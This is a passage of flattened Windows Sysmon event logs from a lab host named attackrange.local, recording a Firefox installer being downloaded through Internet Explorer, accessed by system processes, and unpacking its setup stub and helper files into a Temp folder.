Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:42.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox 
Installer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.896{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDBSetValue2021-01-18 13:59:42.896{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\Firefox Installer.exeBinary Data 
10341000x800000000000000013849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.896{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.896{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.849{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:42.833{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:42.833{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-940F-6005-0C05-00000000A301}64766548C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\SHELL32.dll+8d42f|C:\Windows\System32\SHELL32.dll+8d2bc|C:\Windows\System32\SHELL32.dll+8d00c|C:\Windows\System32\SHELL32.dll+114fd7|C:\Windows\System32\SHELL32.dll+114f35|C:\Windows\SYSTEM32\IEFRAME.dll+2a2c5d|C:\Windows\SYSTEM32\IEFRAME.dll+22c5ec|C:\Windows\SYSTEM32\IEFRAME.dll+22af66|C:\Windows\SYSTEM32\IEFRAME.dll+1dec33|C:\Windows\SYSTEM32\IEFRAME.dll+40711d|C:\Windows\SYSTEM32\IEFRAME.dll+40702e|C:\Windows\SYSTEM32\IEFRAME.dll+3fd12f 154100x800000000000000013841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.843{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe18.05FirefoxFirefoxMozilla7zS.sfx.exe"C:\Users\Administrator\Downloads\Firefox Installer.exe" C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=7BD92030A0CEA3D42BD54903C5CA725D,SHA256=5343F81882C3E545C30534C87281B2342F1856B408D4E56F43B8532D66FEE04B,IMPHASH=00000000000000000000000000000000{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 10341000x800000000000000013840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program 
Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+7dbc|C:\Windows\SYSTEM32\IEFRAME.dll+e51a1|C:\Windows\SYSTEM32\IEFRAME.dll+52c9e|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+d2e47|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\IEFRAME.dll+d96fc|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8 10341000x800000000000000013839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+7dbc|C:\Windows\SYSTEM32\IEFRAME.dll+e51a1|C:\Windows\SYSTEM32\IEFRAME.dll+52c9e|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+d2e47|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\IEFRAME.dll+d96fc|C:\Windows\SYSTEM32\IEFRAME.dll+1196f 10341000x800000000000000013838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.833{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+7dbc|C:\Windows\SYSTEM32\IEFRAME.dll+e51a1|C:\Windows\SYSTEM32\IEFRAME.dll+52c9e|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+d2e47|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\IEFRAME.dll+d96fc|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8 10341000x800000000000000013835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.724{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.724{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:43.583{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe2021-01-18 13:59:43.583 11241100x800000000000000013906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.583{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\InetBgDL.dll2021-01-18 13:59:43.583 10341000x800000000000000013905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:43.443{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.443{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.443{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:43.427{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32